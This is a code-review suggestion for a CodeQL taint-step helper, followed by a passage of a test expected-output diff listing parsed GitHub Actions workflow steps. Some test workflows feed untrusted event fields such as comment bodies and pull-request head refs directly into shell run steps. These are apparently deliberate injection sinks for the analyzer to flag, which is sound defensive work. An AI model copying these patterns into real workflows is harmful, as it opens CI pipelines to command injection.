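Review bot: `xt0rtedSlashCommandActionTaintStep` repeats the body of `tjActionsVerifyChangedFilesTaintStep` with only the source class and the field name changed, and the first hunk of this file fixes exactly the copy-paste slip that this duplication invites (`TJActionsChangedFilesSource` left in the verify predicate). Moving the shared `StepsExpression` match into one private helper that takes the field name would leave each action-specific predicate as two lines and make such a slip harder to repeat. The earlier predicates start outside these hunks, so the sketch below only shows the helper and the new predicate.

```ql
/** Holds if `succ` reads output `field` of the `uses` step that `pred` represents. */
private predicate stepOutputReadStep(DataFlow::Node pred, string field, DataFlow::Node succ) {
  exists(StepsExpression o |
    o.getTarget() = pred.asExpr() and
    o.getStepId() = pred.asExpr().(UsesStep).getId() and
    o.getFieldName() = field and
    succ.asExpr() = o
  )
}

predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
  pred instanceof Xt0rtedSlashCommandSource and
  stepOutputReadStep(pred, "command-arguments", succ)
}
// … unchanged: class TaintSteps …
```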
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 19eda82df48..c80dc006ce7 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -46,11 +46,7 @@ steps | .github/workflows/multiline.yml:78:9:85:6 | Run Step | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | @@ -62,7 +58,12 @@ steps | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -92,23 +93,23 @@ runSteps | .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ 
steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -129,14 +130,17 @@ runExprs | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | runStepChildren | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | 
@@ -171,23 +175,23 @@ runStepChildren | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | 
.github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| 
.github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -340,86 +344,94 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| 
.github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| 
.github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| 
